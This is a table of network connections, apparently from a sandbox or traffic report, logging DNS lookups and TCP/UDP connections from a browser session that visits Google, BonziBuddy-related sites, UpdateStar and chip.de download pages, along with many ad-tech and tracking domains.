| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | udp |
| GB | 142.250.179.238:443 | apis.google.com | udp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 216.58.201.110:443 | play.google.com | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| GB | 172.217.169.78:443 | ogs.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 216.58.201.99:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 216.58.201.110:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| GB | 216.58.201.99:443 | ssl.gstatic.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | bonzibuddy.org | udp |
| US | 198.187.29.31:443 | bonzibuddy.org | tcp |
| US | 198.187.29.31:443 | bonzibuddy.org | tcp |
| US | 198.187.29.31:443 | bonzibuddy.org | tcp |
| US | 198.187.29.31:80 | bonzibuddy.org | tcp |
| US | 198.187.29.31:80 | bonzibuddy.org | tcp |
| US | 198.187.29.31:80 | bonzibuddy.org | tcp |
| US | 198.187.29.31:443 | bonzibuddy.org | tcp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.179.227:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | crappysoftware-miraheze-org.webpkgcache.com | udp |
| GB | 142.250.200.1:443 | crappysoftware-miraheze-org.webpkgcache.com | tcp |
| GB | 142.250.200.1:443 | crappysoftware-miraheze-org.webpkgcache.com | udp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.179.227:443 | id.google.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 142.250.200.38:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| GB | 172.217.16.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | img.youtube.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | bonzi-buddy.updatestar.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| GB | 142.250.178.3:80 | www.gstatic.com | tcp |
| GB | 142.250.179.227:443 | id.google.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| US | 8.8.8.8:53 | www.updatestar.com | udp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| US | 8.8.8.8:53 | w9.updatestar.com | udp |
| GB | 216.58.204.74:443 | ajax.googleapis.com | tcp |
| GB | 216.58.204.66:443 | securepubads.g.doubleclick.net | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| US | 8.8.8.8:53 | www.gravatar.com | udp |
| US | 192.0.73.2:443 | www.gravatar.com | tcp |
| GB | 216.58.204.66:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| BE | 74.125.206.155:443 | stats.g.doubleclick.net | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| GB | 142.250.180.3:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | dcadc2bda460e1219ebc0c27c3ac89e5.safeframe.googlesyndication.com | udp |
| GB | 142.250.187.193:443 | dcadc2bda460e1219ebc0c27c3ac89e5.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | tcp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 142.250.200.33:443 | cdn.ampproject.org | tcp |
| GB | 142.250.200.33:443 | cdn.ampproject.org | tcp |
| GB | 142.250.200.33:443 | cdn.ampproject.org | tcp |
| GB | 142.250.200.33:443 | cdn.ampproject.org | tcp |
| GB | 142.250.200.33:443 | cdn.ampproject.org | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| GB | 216.58.204.78:443 | img.youtube.com | udp |
| US | 8.8.8.8:53 | www.chip.de | udp |
| GB | 2.16.247.146:443 | www.chip.de | tcp |
| GB | 2.16.247.146:443 | www.chip.de | tcp |
| US | 8.8.8.8:53 | content.chip.de | udp |
| US | 8.8.8.8:53 | cmp.chip.de | udp |
| US | 8.8.8.8:53 | cp.chip.de | udp |
| US | 8.8.8.8:53 | tags.chip.de | udp |
| NL | 108.156.60.2:443 | cmp.chip.de | tcp |
| DE | 18.245.86.30:443 | tags.chip.de | tcp |
| GB | 79.127.237.132:443 | cp.chip.de | tcp |
| US | 8.8.8.8:53 | im.chip.de | udp |
| GB | 79.127.237.132:443 | cp.chip.de | udp |
| GB | 79.127.237.132:443 | cp.chip.de | tcp |
| NL | 108.156.60.2:443 | cmp.chip.de | tcp |
| US | 8.8.8.8:53 | app.varify.io | udp |
| US | 8.8.8.8:53 | assets.sp.chip.de | udp |
| US | 104.26.8.83:443 | app.varify.io | tcp |
| CZ | 65.9.95.119:443 | assets.sp.chip.de | tcp |
| US | 8.8.8.8:53 | data-2f2ec12966.chip.de | udp |
| DE | 91.215.100.78:443 | data-2f2ec12966.chip.de | tcp |
| US | 8.8.8.8:53 | sp.chip.de | udp |
| DE | 18.198.152.110:443 | sp.chip.de | tcp |
| DE | 91.215.100.78:443 | data-2f2ec12966.chip.de | tcp |
| DE | 18.198.152.110:443 | sp.chip.de | tcp |
| GB | 2.16.247.146:443 | im.chip.de | tcp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| US | 8.8.8.8:53 | static.cleverpush.com | udp |
| US | 8.8.8.8:53 | script.webinstaller.mein-organizer.de | udp |
| NL | 18.239.94.35:443 | static.hotjar.com | tcp |
| US | 104.26.15.31:443 | static.cleverpush.com | tcp |
| NL | 185.158.249.69:443 | script.webinstaller.mein-organizer.de | tcp |
| GB | 2.16.247.162:443 | im.chip.de | tcp |
| US | 8.8.8.8:53 | script.ioam.de | udp |
| DE | 91.215.100.39:443 | script.ioam.de | tcp |
| US | 8.8.8.8:53 | widgets.outbrain.com | udp |
| US | 8.8.8.8:53 | amplify.outbrain.com | udp |
| US | 8.8.8.8:53 | a.bf-tools.net | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| US | 8.8.8.8:53 | a.bf-ad.net | udp |
| NL | 185.158.249.69:443 | script.webinstaller.mein-organizer.de | tcp |
| GB | 23.219.197.58:443 | amplify.outbrain.com | tcp |
| GB | 23.219.197.58:443 | amplify.outbrain.com | tcp |
| GB | 2.16.247.181:443 | a.bf-ad.net | tcp |
| GB | 2.16.247.166:443 | a.bf-ad.net | tcp |
| NL | 13.227.219.28:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | wave.outbrain.com | udp |
| US | 8.8.8.8:53 | tr.outbrain.com | udp |
| US | 8.8.8.8:53 | mds.bf-tools.net | udp |
| US | 8.8.8.8:53 | api.permutive.com | udp |
| US | 8.8.8.8:53 | rtt.bf-tools.net | udp |
| US | 64.74.236.95:443 | tr.outbrain.com | tcp |
| US | 8.8.8.8:53 | partners.wfxtriggers.com | udp |
| US | 64.74.236.95:443 | tr.outbrain.com | tcp |
| US | 8.8.8.8:53 | cdn.permutive.com | udp |
| US | 8.8.8.8:53 | utiq.chip.de | udp |
| DE | 18.198.134.217:443 | mds.bf-tools.net | tcp |
| US | 34.107.254.252:443 | api.permutive.com | tcp |
| GB | 2.16.247.166:443 | rtt.bf-tools.net | tcp |
| US | 151.101.66.132:443 | partners.wfxtriggers.com | tcp |
| US | 104.17.109.19:443 | cdn.permutive.com | tcp |
| DE | 18.158.98.81:443 | utiq.chip.de | tcp |
| US | 8.8.8.8:53 | widget-pixels.outbrain.com | udp |
| US | 8.8.8.8:53 | chip.mycleverpush.com | udp |
| DE | 78.46.198.121:443 | chip.mycleverpush.com | tcp |
| US | 8.8.8.8:53 | mv.outbrain.com | udp |
| US | 151.101.194.132:443 | mv.outbrain.com | tcp |
| US | 8.8.8.8:53 | ad.yieldlab.net | udp |
| GB | 216.58.204.66:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| GB | 2.16.247.166:443 | rtt.bf-tools.net | tcp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | cdn.brandmetrics.com | udp |
| GB | 2.19.117.70:443 | acdn.adnxs.com | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| US | 104.26.15.31:443 | static.cleverpush.com | tcp |
| US | 8.8.8.8:53 | api.cleverpush.com | udp |
| NL | 18.239.70.203:443 | c.amazon-adsystem.com | tcp |
| US | 172.67.69.191:443 | cdn.brandmetrics.com | tcp |
| US | 104.26.14.31:443 | api.cleverpush.com | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| DE | 18.158.98.81:443 | utiq.chip.de | tcp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| NL | 185.89.210.212:443 | ib.adnxs.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| GB | 2.16.247.166:443 | rtt.bf-tools.net | tcp |
| DE | 185.212.44.250:443 | script.webinstaller.mein-organizer.de | tcp |
| US | 8.8.8.8:53 | ssbsync-global.smartadserver.com | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 8.8.8.8:53 | prebid-match.dotomi.com | udp |
| US | 8.8.8.8:53 | orbidder.otto.de | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| FR | 5.196.111.69:443 | ssbsync-global.smartadserver.com | tcp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| BE | 35.210.58.154:443 | orbidder.otto.de | tcp |
| DK | 37.157.2.228:443 | c1.adform.net | tcp |
| DE | 185.212.44.250:443 | script.webinstaller.mein-organizer.de | tcp |
| NL | 89.207.16.204:443 | prebid-match.dotomi.com | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| GB | 172.217.169.66:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | c8c3489e-f329-40e8-bcfc-1f852e512b01.prmutv.co | udp |
| US | 35.241.9.51:443 | c8c3489e-f329-40e8-bcfc-1f852e512b01.prmutv.co | tcp |
| NL | 18.239.70.203:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | cm.adsafety.net | udp |
| US | 34.107.254.252:443 | api.permutive.com | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | demographics.bf-sugarless-production.aws.bfops.io | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| DE | 217.79.187.69:443 | cm.adsafety.net | tcp |
| DE | 18.192.221.150:443 | demographics.bf-sugarless-production.aws.bfops.io | tcp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | tcp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | tcp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | tcp |
| NL | 18.238.243.82:443 | config.aps.amazon-adsystem.com | tcp |
| NL | 18.238.243.82:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | mcdp-chidc2.outbrain.com | udp |
| US | 50.31.142.63:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 50.31.142.63:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 8.8.8.8:53 | libs.outbrain.com | udp |
| US | 50.31.142.63:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 50.31.142.63:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 50.31.142.63:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 34.107.254.252:443 | api.permutive.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| DE | 162.19.138.82:443 | id5-sync.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 104.17.109.19:443 | cdn.permutive.com | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | data.webinstaller.statt-park.de | udp |
| US | 8.8.8.8:53 | sync.outbrain.com | udp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| NL | 185.158.249.69:443 | data.webinstaller.statt-park.de | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 8.8.8.8:53 | dpm.demdex.net | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| GB | 172.217.169.66:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 104.17.109.19:443 | cdn.permutive.com | tcp |
| NL | 185.158.249.69:443 | data.webinstaller.statt-park.de | tcp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | tcp |
| US | 8.8.8.8:53 | dsp-cookie.adfarm1.adition.com | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| DE | 162.19.138.82:443 | id5-sync.com | tcp |
| US | 70.42.32.255:443 | b1sync.zemanta.com | tcp |
| IE | 52.212.150.189:443 | dpm.demdex.net | tcp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | adsdkprod.azureedge.net | udp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| IE | 54.76.45.185:443 | sync.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| NL | 18.239.68.199:443 | aax.amazon-adsystem.com | tcp |
| NL | 18.239.68.199:443 | aax.amazon-adsystem.com | tcp |
| US | 13.107.246.64:443 | adsdkprod.azureedge.net | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| DE | 80.82.210.217:443 | dsp-cookie.adfarm1.adition.com | tcp |
| US | 8.8.8.8:53 | crt.rootg2.amazontrust.com | udp |
| NL | 18.239.36.28:80 | crt.rootg2.amazontrust.com | tcp |
| US | 8.8.8.8:53 | loadus.exelator.com | udp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | ups.xplosion.de | udp |
| US | 8.8.8.8:53 | functions.adnami.io | udp |
| IE | 54.78.254.47:443 | loadus.exelator.com | tcp |
| GB | 2.19.117.8:443 | functions.adnami.io | tcp |
| IE | 34.241.186.48:443 | ups.xplosion.de | tcp |
| US | 8.8.8.8:53 | x.chip.de | udp |
| GB | 2.16.247.162:443 | x.chip.de | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| DE | 185.212.44.250:443 | data.webinstaller.statt-park.de | tcp |
| DE | 185.212.44.250:443 | data.webinstaller.statt-park.de | tcp |
| US | 8.8.8.8:53 | bidder.criteo.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | videoexternalapi.outbrain.com | udp |
| US | 8.8.8.8:53 | dis.eu.criteo.com | udp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| US | 8.8.8.8:53 | chip-cluster.de | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 70.42.32.63:443 | videoexternalapi.outbrain.com | tcp |
| NL | 178.250.1.9:443 | dis.eu.criteo.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 67.220.228.202:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | cdn.xplosion.de | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | macro.adnami.io | udp |
| US | 8.8.8.8:53 | upload.wikimedia.org | udp |
| US | 8.8.8.8:53 | di-images.sftcdn.net | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 151.101.1.91:443 | di-images.sftcdn.net | tcp |
| US | 151.101.1.91:443 | di-images.sftcdn.net | tcp |
| US | 151.101.1.91:443 | di-images.sftcdn.net | tcp |
| US | 151.101.1.91:443 | di-images.sftcdn.net | tcp |
| GB | 2.19.117.9:443 | macro.adnami.io | tcp |
| NL | 185.15.59.240:443 | upload.wikimedia.org | tcp |
| US | 3.165.148.99:443 | cdn.xplosion.de | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| IE | 67.220.228.202:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | ice.360yield.com | udp |
| IE | 63.32.245.173:443 | ice.360yield.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| DE | 162.19.138.118:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| NL | 18.239.94.92:443 | s.ad.smaato.net | tcp |
| US | 8.8.8.8:53 | ssbsync.smartadserver.com | udp |
| FR | 178.32.210.230:443 | ssbsync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | pbc.agma-analytics.de | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| DE | 18.185.167.41:443 | pbc.agma-analytics.de | tcp |
| US | 13.107.21.237:443 | c.bing.com | tcp |
| US | 8.8.8.8:53 | crb.kargo.com | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 8.8.8.8:53 | acdn.adnxs-simple.com | udp |
| DE | 3.77.58.244:443 | crb.kargo.com | tcp |
| GB | 87.248.114.11:443 | ups.analytics.yahoo.com | tcp |
| US | 151.101.65.108:443 | acdn.adnxs-simple.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 8.8.8.8:53 | uipglob.semasio.net | udp |
| DK | 77.243.51.121:443 | uipglob.semasio.net | tcp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| US | 8.8.8.8:53 | cs.media.net | udp |
| GB | 23.39.224.21:443 | cs.media.net | tcp |
| US | 8.8.8.8:53 | csync.loopme.me | udp |
| NL | 35.214.132.64:443 | csync.loopme.me | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| US | 151.101.65.108:443 | acdn.adnxs-simple.com | tcp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 54.157.210.240:443 | sync.srv.stackadapt.com | tcp |
| US | 151.101.65.108:443 | acdn.adnxs-simple.com | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | js-sec.indexww.com | udp |
| GB | 23.219.196.188:443 | ads.pubmatic.com | tcp |
| US | 104.18.38.76:443 | js-sec.indexww.com | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| NL | 89.207.16.204:443 | prebid-match.dotomi.com | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| DK | 37.157.2.228:443 | c1.adform.net | tcp |
| US | 8.8.8.8:53 | sync.connectad.io | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 98.82.157.231:443 | s.amazon-adsystem.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| NL | 35.214.132.64:443 | csync.loopme.me | tcp |
| US | 8.8.8.8:53 | cdn.indexww.com | udp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| DE | 37.252.171.21:443 | secure.adnxs.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| DK | 37.157.2.228:443 | c1.adform.net | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| NL | 35.214.132.64:443 | csync.loopme.me | tcp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 104.22.55.206:443 | sync.connectad.io | tcp |
| FR | 5.196.111.69:443 | ssbsync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | chip-cluster.de | udp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| DE | 18.198.152.110:443 | sp.chip.de | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | www.chip.de | udp |
| GB | 2.16.247.162:443 | www.chip.de | tcp |
| US | 8.8.8.8:53 | securedl.cdn.chip.de | udp |
| DE | 2.19.11.98:443 | securedl.cdn.chip.de | tcp |
| US | 8.8.8.8:53 | www.trustedoffers.de | udp |
| NL | 185.158.249.69:443 | www.trustedoffers.de | tcp |
| US | 8.8.8.8:53 | api.chip-secured-download.de | udp |
| DE | 116.203.169.158:443 | api.chip-secured-download.de | tcp |
| DE | 116.203.169.158:443 | api.chip-secured-download.de | tcp |
| GB | 2.16.247.146:443 | www.chip.de | tcp |
| DE | 185.212.44.250:443 | www.trustedoffers.de | tcp |
| DE | 18.245.86.30:443 | tags.chip.de | tcp |
| US | 8.8.8.8:53 | videoplayer.chip.de | udp |
| CZ | 65.9.95.56:443 | videoplayer.chip.de | tcp |
| US | 8.8.8.8:53 | cdn.greenvideo.io | udp |
| US | 8.8.8.8:53 | media-video.chip.de | udp |
| GB | 2.16.247.162:443 | www.chip.de | tcp |
| NL | 18.65.39.35:443 | cdn.greenvideo.io | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| US | 8.8.8.8:53 | de.ioam.de | udp |
| NL | 18.65.39.35:443 | cdn.greenvideo.io | tcp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | static.chip-secured-download.de | udp |
| DE | 116.203.169.156:80 | static.chip-secured-download.de | tcp |
| NL | 108.156.60.2:443 | cmp.chip.de | tcp |
| US | 8.8.8.8:53 | embeds.greenvideo.io | udp |
| GB | 54.230.10.124:443 | embeds.greenvideo.io | tcp |
| US | 8.8.8.8:53 | benelph.de | udp |
| US | 104.26.8.83:443 | app.varify.io | tcp |
| DE | 136.243.25.11:443 | benelph.de | tcp |
| US | 8.8.8.8:53 | downloaderapi.chip.de | udp |
| US | 8.8.8.8:53 | api.trustedoffers.de | udp |
| NL | 185.158.249.69:443 | api.trustedoffers.de | tcp |
| US | 8.8.8.8:53 | media-api-prod.greenvideo.io | udp |
| NL | 18.238.243.2:443 | media-api-prod.greenvideo.io | tcp |
| DE | 91.215.100.78:443 | data-2f2ec12966.chip.de | tcp |
| DE | 91.215.100.39:443 | script.ioam.de | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
